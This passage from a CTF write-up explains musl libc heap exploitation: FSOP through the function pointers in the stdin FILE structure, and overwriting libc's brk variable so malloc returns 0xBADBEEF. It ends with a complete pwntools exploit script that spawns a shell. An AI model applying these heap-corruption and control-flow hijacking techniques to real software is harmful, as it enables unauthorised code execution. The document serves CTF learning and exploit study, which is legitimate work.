With the libc base leaked and an arbitrary address write in hand, the next step is hijacking control flow to get a shell. musl libc has no convenient hook like __malloc_hook, so the only practical method here (ignoring the unintended solution above) is FSOP: overwriting the function pointers inside a FILE structure.

pwndbg> ptype stdin
type = struct _IO_FILE {
    unsigned int flags;
    unsigned char *rpos;
    unsigned char *rend;
    int (*close)(FILE *);
    unsigned char *wend;
    unsigned char *wpos;
    unsigned char *mustbezero_1;
    unsigned char *wbase;
    size_t (*read)(FILE *, unsigned char *, size_t);
    size_t (*write)(FILE *, const unsigned char *, size_t);
    off_t (*seek)(FILE *, off_t, int);
    unsigned char *buf;
    size_t buf_size;
    FILE *prev;
    FILE *next;
    int fd;
    int pipe_pid;
    long lockcount;
    int mode;
    volatile int lock;
    int lbf;
    void *cookie;
    off_t off;
    char *getln_buf;
    void *mustbezero_2;
    unsigned char *shend;
    off_t shlim;
    off_t shcnt;
    FILE *prev_locked;
    FILE *next_locked;
    struct __locale_struct *locale;
} * const
pwndbg> vmmap stdin
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x7ffff7ffb000     0x7ffff7ffc000 rw-p     1000 92000 /pwn/Debug/libc.so
pwndbg> 

The above is the definition of the _IO_FILE structure. Unlike glibc, musl libc's _IO_FILE has no vtable; there are only four function pointers (close, read, write and seek) scattered at different offsets within the structure. Since the memory holding the stdin, stdout and stderr structures is writable, we can overwrite these fields with our arbitrary address write.
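
To see which offsets the FSOP payload below has to hit, here is a small sketch that mirrors the layout printed by ptype above (function pointer parameter types simplified) and computes the relevant field offsets, assuming a 64-bit build with natural alignment:

#include <stddef.h>
#include <stdio.h>

struct musl_FILE {
    unsigned int flags;
    unsigned char *rpos, *rend;
    int (*close)(void *);
    unsigned char *wend, *wpos;
    unsigned char *mustbezero_1;
    unsigned char *wbase;
    size_t (*read)(void *, unsigned char *, size_t);
    size_t (*write)(void *, const unsigned char *, size_t);
    /* ... remaining fields are not needed for the payload ... */
};

int main(void)
{
    printf("flags : %zu\n", offsetof(struct musl_FILE, flags)); /* 0  */
    printf("wpos  : %zu\n", offsetof(struct musl_FILE, wpos));  /* 40 */
    printf("wbase : %zu\n", offsetof(struct musl_FILE, wbase)); /* 56 */
    printf("write : %zu\n", offsetof(struct musl_FILE, write)); /* 72 */
    return 0;
}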

//sub_400E07
p = (char *)malloc(size);
if ( p == (char *)0xBADBEEF )
{
  sub_400AEC("ERROR: Bad beef\n");
  exit(-1);
} 

The program calls exit in exactly one place.

//src/exit/exit.c L27-L33
_Noreturn void exit(int code)
{
    __funcs_on_exit();
    __libc_exit_fini();
    __stdio_exit();  <---
    _Exit(code);
} 
//src/stdio/__stdio_exit.c L16-L23
void __stdio_exit(void)
{
    FILE *f;
    for (f=*__ofl_lock(); f; f=f->next) close_file(f);
    close_file(__stdin_used);  <---
    close_file(__stdout_used);
    close_file(__stderr_used);
} 
//src/stdio/__stdio_exit.c L8-L14
static void close_file(FILE *f)
{
    if (!f) return;
    FFINALLOCK(f);
    if (f->wpos != f->wbase) f->write(f, 0, 0);  <---
    if (f->rpos != f->rend) f->seek(f, f->rpos-f->rend, SEEK_CUR);
} 

Reading the source, exit eventually calls __stdio_exit to close all open file streams. In close_file, if a stream f satisfies f->wpos != f->wbase, the write function pointer in its FILE structure is invoked as f->write(f, 0, 0).

payload  = "/bin/shx00"    # stdin->flags
payload += 'X' * 32
payload += p64(0xdeadbeef)  # stdin->wpos
payload += 'X' * 8
payload += p64(0xbeefdead)  # stdin->wbase
payload += 'X' * 8
payload += p64(system)      # stdin->write

edit(stdin, payload) 

Triggering the FSOP is simple: write "/bin/sh\x00" into the first 8 bytes of the stdin structure, point the write pointer at system, make stdin->wpos != stdin->wbase, and finally have the program call exit to get a shell.

Besides exit, similar FSOP trigger points exist in standard I/O functions such as scanf, printf and puts; if you are interested, read their source code.

4.4 Return 0xBADBEEF

To reach the exit call, however, malloc has to return the address 0xBADBEEF, which obviously is not a valid memory address by default. By modifying a global variable named brk inside libc, we can make 0xBADBEEF both a normally accessible address and the address that malloc returns.

//src/malloc/malloc.c L303-L315
void *malloc(size_t n)
{

[...]

    for (;;) {
        uint64_t mask = mal.binmap & -(1ULL<<i);
        // If all usable bins are empty, create a new chunk with expand_heap
        if (!mask) {
            c = expand_heap(n);  <---
            if (!c) return 0;
            // Merge the new chunk with the free chunk just below it, if any
            if (alloc_rev(c)) {
                struct chunk *x = c;
                c = PREV_CHUNK(c);
                NEXT_CHUNK(x)->psize = c->csize =
                    x->csize + CHUNK_SIZE(c);
            }
            break;
        }

[...]
} 

When all usable bins are empty, malloc calls expand_heap to extend the heap and create a new chunk. Internally, expand_heap calls __expand_heap.

//src/malloc/expand_heap.c L39-L61
void *__expand_heap(size_t *pn)
{
    static uintptr_t brk; // the brk pointer (current end of the data segment)
    static unsigned mmap_step;
    size_t n = *pn; // n is the requested chunk size

    // Fail if n exceeds 0x7FFFFFFFFFFFEFFF
    if (n > SIZE_MAX/2 - PAGE_SIZE) {
        errno = ENOMEM;
        return 0;
    }
    n += -n & PAGE_SIZE-1;

    // Initialize brk on the first call
    if (!brk) {
        brk = __syscall(SYS_brk, 0);
        brk += -brk & PAGE_SIZE-1;
    }

    // Extend the data segment from brk to brk+n with the brk system call;
    // on success, advance brk and return the old value
    if (n < SIZE_MAX-brk && !traverses_stack_p(brk, brk+n)
        && __syscall(SYS_brk, brk+n)==brk+n) {   <---
        *pn = n;
        brk += n;
        return (void *)(brk-n);
    }

    // If brk fails, fall back to mmap
    [...]
} 

Inside __expand_heap, brk is a pointer to the end of the data segment (dynamic memory). The function issues the brk system call __syscall(SYS_brk, brk+n) to push the end of the data segment back by n bytes, and the newly extended region is returned to malloc to be handed to the user as a new chunk.

Because the program is built without PIE, the data segment sits at a low fixed address (below 0x2000000), below 0xBADBEEF with nothing mapped in between. If the brk pointer is overwritten with 0xBADBEEF - n, the brk system call will extend the data segment past 0xBADBEEF, turning it into an accessible memory address.

edit(binmap,  'X' * 16 + p64(0))
edit(brk,     p64(0xbadbeef - 0x20))

add(0) # 0xbadbeef 

Set mal.binmap to 0 and brk to 0xbadbeef - 0x20, then call add(0) to allocate a 0x20-byte chunk: malloc returns 0xBADBEEF.
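
Why brk is set to 0xbadbeef - 0x20 rather than 0xbadbeef: as far as I can tell from expand_heap() in src/malloc/malloc.c (worth re-checking against the source), __expand_heap() returns the old brk value, and expand_heap() then shifts the usable region forward by SIZE_ALIGN to make room for a sentinel chunk header, so the pointer malloc finally returns is old_brk + 0x20. A sketch of the arithmetic:

#include <stdint.h>
#include <stdio.h>

#define SIZE_ALIGN 0x20UL   /* 4 * sizeof(size_t) on 64-bit */
#define OVERHEAD   0x10UL

int main(void)
{
    uintptr_t fake_brk = 0xbadbeefUL - 0x20;  /* value written into libc's brk variable */
    uintptr_t p   = fake_brk;                 /* what __expand_heap() hands back */
    uintptr_t mem = p + SIZE_ALIGN;           /* expand_heap(): p = (char *)p + SIZE_ALIGN */
    /* malloc() returns CHUNK_TO_MEM(MEM_TO_CHUNK(mem)) == mem */
    printf("malloc returns %#lx\n", (unsigned long)mem);  /* 0xbadbeef */
    return 0;
}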

Note that the fake chunk around mal.binmap needs to be constructed beforehand, so that the original binmap value is not destroyed prematurely.

4.5 Exploit script

The exploit Python script is as follows:

#!/usr/bin/env python2
from pwn import *
import sys

context(arch="amd64", log_level="debug")

if len(sys.argv) >= 3:
    p = remote(sys.argv[1], sys.argv[2])
else:
    p = process("./carbon")

def alloc(sz, ctx='\n', ans='N'):
    p.sendlineafter(">", '1')
    p.sendlineafter("What is your prefer size? >", str(sz))
    p.sendlineafter("Are you a believer? >", ans)
    p.sendafter("Say hello to your new sleeve >", ctx)

def free(idx):
    p.sendlineafter(">", '2')
    p.sendlineafter("What is your sleeve ID? >", str(idx))

def edit(idx, ctx):
    p.sendlineafter(">", '3')
    p.sendlineafter("What is your sleeve ID? >", str(idx))
    p.send(ctx)

def view(idx):
    p.sendlineafter(">", '4')
    p.sendlineafter("What is your sleeve ID? >", str(idx))
    return p.recvuntil("Done.", True)

alloc(0x1, 'A') #0

libc_base = u64(view(0).ljust(8, '\x00')) - 0x292e41

info("libc base: 0x%x", libc_base)
stdin   = libc_base + 0x292200
binmap  = libc_base + 0x292ac0
brk     = libc_base + 0x295050
bin     = libc_base + 0x292e40
system  = libc_base + 0x42688

# 1. construct fake chunks
alloc(0x10) #1
alloc(0x10) #2, prevent consolidation
alloc(0x10) #3
alloc(0x10) #4, prevent consolidation
alloc(0x10) #5
alloc(0x10) #6, prevent consolidation
alloc(0x10) #7
alloc(0x10) #8, prevent consolidation

free(1)
free(3)

payload  = 'X' * 0x10
payload += p64(0x21) * 2 + 'X' * 0x10
payload += p64(0x21) + p64(0x20) + p64(stdin - 0x10) * 2
payload += p8(0x20)
payload += '\n'

alloc(0x10, payload, 'Y')   #1
alloc(0x10)                 #3
free(1) # set as non-empty bin

edit(3, p64(binmap - 0x20) * 2)
alloc(0x10)             #1
free(5) # set as non-empty bin

edit(3, p64(brk - 0x10) * 2)
alloc(0x10)             #5
free(7) # set as non-empty bin

# 2. corrupt bin head and get arbitrary pointers
edit(3, p64(bin - 0x10) + p64(stdin - 0x10))
alloc(0x10) #7
alloc(0x50) #9

edit(3, p64(bin - 0x10) + p64(brk - 0x10))
alloc(0x10) #10
alloc(0x50) #11

edit(3, p64(bin - 0x10) + p64(binmap - 0x20))
alloc(0x10) #12
alloc(0x50) #13

# 3. corrupt stdin, binmap and brk
payload  = "/bin/shx00"    # stdin->flags
payload += 'X' * 0x20
payload += p64(0xdeadbeef)  # stdin->wpos
payload += 'X' * 8
payload += p64(0xbeefdead)  # stdin->wbase
payload += 'X' * 8
payload += p64(system)      # stdin->write

edit(9, payload) # stdin
edit(11, p64(0xbadbeef - 0x20) + '\n')  # brk
edit(13, 'X' * 0x10 + p64(0) + '\n')    # binmap

# 4. get shell
p.sendlineafter(">", '1')
p.sendlineafter("What is your prefer size? >", '0')

p.interactive() 

 

5. Summary

This article showed how, under musl libc, a heap overflow can be used to hijack the head of a bin list, how unbin can be abused to tamper with list pointers and gain arbitrary address writes, and how a shell can finally be obtained through FSOP. It also covered the overall implementation of the musl libc heap manager, the trick for making malloc return an arbitrary address, and the mistakes made while setting the challenge together with their fixes.

 

6. References

  1. musl libc source code (GitHub mirror)
  2. mmap manual page
  3. Implementation of mmap address randomization
  4. brk manual page
  5. Implementation of brk address randomization